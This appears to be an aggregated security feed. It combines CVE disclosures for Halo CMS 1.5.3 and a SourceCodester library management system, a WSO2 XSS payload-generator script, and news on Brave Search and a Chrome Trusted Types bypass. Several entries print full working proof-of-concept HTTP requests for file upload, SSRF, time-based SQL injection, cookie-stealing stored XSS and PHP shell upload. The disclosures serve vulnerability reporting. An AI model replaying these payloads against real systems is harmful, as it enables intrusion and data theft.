Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.

**Proof of Concept**

    POST /api/admin/attachments/upload HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Length: 219
    Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
    Origin: http://127.0.0.1:8090
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8090/admin/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
    Connection: close
    
    ------WebKitFormBoundaryFxTUuVBMVJqfHQHX
    Content-Disposition: form-data; name="file"; filename="2.jsp"
    Content-Type: application/octet-stream
    
    1<script>alert(1)</script>
    ------WebKitFormBoundaryFxTUuVBMVJqfHQHX--
    

  

permalink: AttachmentServiceImpl.java L110  
Security is not checked in the relevant code

CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports

Halo CMS v1.5.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the template remote download function.

https://github.com/halo-dev/halo/

There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3. The attacker needs to enter a link that ends with a zip , such as http://127.0.0.1:40001/1.zip

**Proof of Concept**

    POST /api/admin/themes/fetching?uri=http://127.0.0.1:40000/1.zip HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Length: 2
    Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: application/json
    Origin: http://127.0.0.1:8090
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8090/admin/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=node08slatpind75xksvtriiymt214.node0
    Connection: close
    
    {
    

  

permalink: ZipThemeFetcher.java#L43  
The destination address is not limited in the code, so it can cause ssrf vulnerability

CVE-2022-32995: There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3 in halo-dev/halo · Issue #2 · zongdeiqianxing/cve-reports

Brave Search, the privacy search engine you may not have heard of, is a year old and growing fast. 
The post Brave Search wants to replace Google’s biased search results with yours appeared first on Malwarebytes Labs.

Brave Search, Brave Software’s privacy search engine, just turned one. To celebrate, the company says it is moving the search engine out of its beta phase to become the default search engine for all Brave browser users.

**Goodbye, Google? Not entirely.**

In May 2015, Mozilla alumni Brendan Eich and Brian Bondy launched Brave Software. Its first product was the Brave Browser, a privacy-friendly, Chromium-based internet browser that automatically blocks ads and site trackers. In March 2021, the company launched Brave Search so it could use its own index to generate search results.

In a recent announcement, the company said its search engine had passed 2.5 billion queries since its release a year earlier. That was a staggering increase in a year, from 8.1 million search queries to 411.7M by May 2022. However, as impressive as that is, Brave Search (and the other privacy search engine, DuckDuckGo) are still lightyears away from challenging Google’s hegemony. While Google enjoys a 92% market share, Brave has yet to break out of the search engine ranking’s miniscule “other” category.

Besides a loyal following, one reason for Brave Search’s fast growth is likely that it (mostly) avoids using third-party search indexes, such as Google and Bing. According to Brave’s blog, 92 percent of queries users receive are directly from Brave’s search index. The company admitted, however, that they will be pulling search results from other providers—Google in particular—if their index doesn’t have enough data of its own.

> Search engines that depend too much, or exclusively, on Big Tech are subject to their censorship, biases, and editorial decisions. The Web needs multiple search providers—without choice there’s no freedom.
> 
> Brave’s blog

Brave Search is currently ad-free, but the company has plans to work on an ad-supported version of Search. This will involve Brave Ads, Brave’s adtech platform. Users who click these ads are rewarded 70 percent of the ad revenue.

While Brave is quick to claim that its query algorithms are unbiased, The Verge pointed out that all algorithms have inherent biases. But Goggles, a new feature, may help to mitigate this.

**Going gaga over Goggles**

Brave also announced a new Brave Search results curation feature called “Goggles,” which interested users can start testing out right now. The company has already prepared some demos to try.

“Goggles will enable anyone, or any community of people, to create sets of rules and filters to constrain the searchable space and / or alter the ordering of search results,” the browser company explains. “Essentially, Goggles will act as a re-ranking option on top of the Brave Search index.”

Sample of Brave Search query results using Goggle

The search team released a white paper on Goggles, detailing its features and showcasing how these work using examples. In a nutshell, Brave is giving its users access to information filtered by their own explicit biases. This means that users’ preferences take precedence over Brave’s preferences.

Brave presented benefits for both the average user and content creator:

“The benefit for the users is that they would be empowered to explore multiple realities in a straight-forward way. The point is to offer people the freedom to choose their own biases while being conscious of them.”

“The benefit for the content creators is that they have multiple options to expose their content, by increasing their potential audience, which will reduce the need to optimize for the single set of biases implicitly encoded in the search engine’s ranking.”

The only downside to Goggles, so far, is that it’s not as easy to use as you might think. You can’t simply enter keywords or personalize preset filters. There is some coding involved, which might put off users without coding experience.

In addition to Goggles, Brave also released Discussions in April. This is a way to augment Brave Search results with actual conversations pulled from popular sites, all related to the search query.

Brave Search wants to replace Google’s biased search results with yours

Library Management System with QR Code version 1.0 suffers from a remote SQL injection vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 SQLInjection#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md#### Description：##### The reason for the SQL injection vulnerability is that the websiteapplication does not verify the validity of the data submitted by the userto the server (type, length, business parameter validity, etc.), and doesnot effectively filter the data input by the user with special characters ,so that the user's input is directly brought into the database forexecution, which exceeds the expected result of the original design of theSQL statement, resulting in a SQL injection vulnerability.LibraryManagement System with QR code Attendance does not filter the contentcorrectly at the "bookdetails.php" id parameter, resulting in thegeneration of SQL injection.#### Payload used:`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`#### POC1.  Login into the CMS.Admin Default Access:Username: adminPassword: admin2. http://localhost/LMS/librarian/bookdetails.php?id=1913. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)--PbtB`)4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`5. code```GET/LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtBHTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close```

Library Management System With QR Code 1.0 SQL Injection

Library Management System with QR Code version 1.0 suffers from a persistent cross site scripting vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 StoredCross-Site Scripting#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md#### Description：#### Library Management System with QR code Attendance is vulnerable toStored cross-site scripting on the profile edit page. The "Name" parameterin 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.#### Impact: An attacker could steal cookies with a crafted URL sent to the victims.### POC```POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1Host: localhostContent-Length: 115Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/admin/edit_admin_details.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: closeName=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=```

Library Management System With QR Code 1.0 Cross Site Scripting

Library Management System with QR Code version 1.0 suffers from a remote shell upload vulnerability.

    #### Title: Library Management System with QR code Attendance_File UploadRCE#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md#### Description：#### At the file upload function, the application system checks thevalidity of the file type, format, and content uploaded by the user, sothat attackers can upload Webshell (.php, .jsp, asp, etc.) malicious scriptfiles or files in unexpected formats, such as: HTML files, SHTML files,etc., at the same time, you can use characters such as directory jump orcontrol the upload directory to directly upload files to the Web directoryor any directory, which may lead to the execution of arbitrary maliciousscript files on the remote server, thereby directly obtaining applicationsystem permissions.#### $uploaddir = 'assets/uploads/';#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);#### Payload used:`<?php phpinfo();?>`### POC```POST /LMS/card/index.php HTTP/1.1Host: localhostContent-Length: 1056Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryngJP5BxPA6UsA91OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/card/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="name"File_Upload------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="grade"Computer Studies------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="dob"Student------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="address"Testing Testing------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="email"ashish@cyberthoth.in------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="exp_date"1990-02-11------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="id_no"8529637------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="phone"1212121212------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="image"; filename="File_upload.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryngJP5BxPA6UsA91O--```#### Access below URL:`http://localhost/LMS/card/assets/uploads/File_upload.php`![image](https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png)

Library Management System With QR Code 1.0 Shell Upload

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

    # Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

WSO2 Management Console Cross Site Scripting

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

John Leyden 27 June 2022 at 15:25 UTC

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

Security researchers have uncovered multiple unprotected properties to bypass Trusted Types, a widely used web security mechanism, in some scenarios.

Trusted Types is an important technology that allows websites to define strict rules on handling various DOM (Document Object Model) properties, a useful technique in guarding against DOM-based cross-site scripting (XSS) attacks.

A bypass discovered by well-known researcher Masato Kinugawa uses attribute properties to bypass the protection that Trusted Types would normally offer.

If a site was to use these properties and was vulnerable to DOM XSS then Trusted Types would not protect it, Kinugawa found. If a site modified an existing attribute value via nodeValue/textContent, as explained in a post on a Chrome security mailing list, then Trusted Types would ignore the assignment completely.

Catch up on the latest browser-related security news and analysis

The vulnerability was demonstrated in Chrome v100.0.4892.0 (Official Build) canary (64-bit). Other versions of Chrome and other browsers may be vulnerable, but this has not been tested.

The latest versions of Chrome address the problem.

The vulnerability – tracked as CVE-2022-1494 and said to involve “insufficient data validation in Trusted Types” – was first reported on February 16 but details were only publicly released last week.

The Daily Swig contacted both Kinugawa and Krzysztof Kotowicz, the Google software engineer who created Trusted Types, for comment. No word back, as yet, but we’ll update this story as and when more information comes to hand.

RELATED Google checks rise of DOM XSS with Trusted Types

Untrusted types: Researcher demos trick to beat Trusted Types protection in Google Chrome

A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance 1.0 SQL Injection****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md****Description：****The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails" id parameter, resulting in the generation of SQL injection.****Payload used:**

' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB

**POC**

1.  Login into the CMS. Admin Default Access:

Username: admin

Password: admin

2.  http://localhost/LMS/librarian/bookdetails.php?id=191
    
3.  Put sleep(5) payload (' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB)
    
4.  http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB
    
5.  code
    

    GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    

**line 111 of bookdetails.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands**

CVE-2022-2214: CVE/POC.md at main · CyberThoth/CVE

A vulnerability was found in SourceCodester Library Management System 1.0. It has been classified as critical. Affected is an unknown function of the component /card/index.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance\_File Upload RCE****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File\_Upload/POC.md****Description：****At the file upload function, the application system checks the validity of the file type, format, and content uploaded by the user, so that attackers can upload Webshell (.php, .jsp, asp, etc.) malicious script files or files in unexpected formats, such as: HTML files, SHTML files, etc., at the same time, you can use characters such as directory jump or control the upload directory to directly upload files to the Web directory or any directory, which may lead to the execution of arbitrary malicious script files on the remote server, thereby directly obtaining application system permissions.****$uploaddir = 'assets/uploads/';****$uploadfile = $uploaddir . basename($\_FILES\['image'\]\['name'\]);****Payload used:**

<?php phpinfo();?>

**POC**

    POST /LMS/card/index.php HTTP/1.1
    Host: localhost
    Content-Length: 1056
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/LMS/card/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="name"
    
    File_Upload
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="grade"
    
    Computer Studies
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="dob"
    
    Student
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="address"
    
    Testing Testing
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="email"
    
    ashish@cyberthoth.in
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="exp_date"
    
    1990-02-11
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="id_no"
    
    8529637
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="phone"
    
    1212121212
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="image"; filename="File_upload.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryngJP5BxPA6UsA91O--
    

**Access below URL:**

http://localhost/LMS/card/assets/uploads/File_upload.php

Tag

#chrome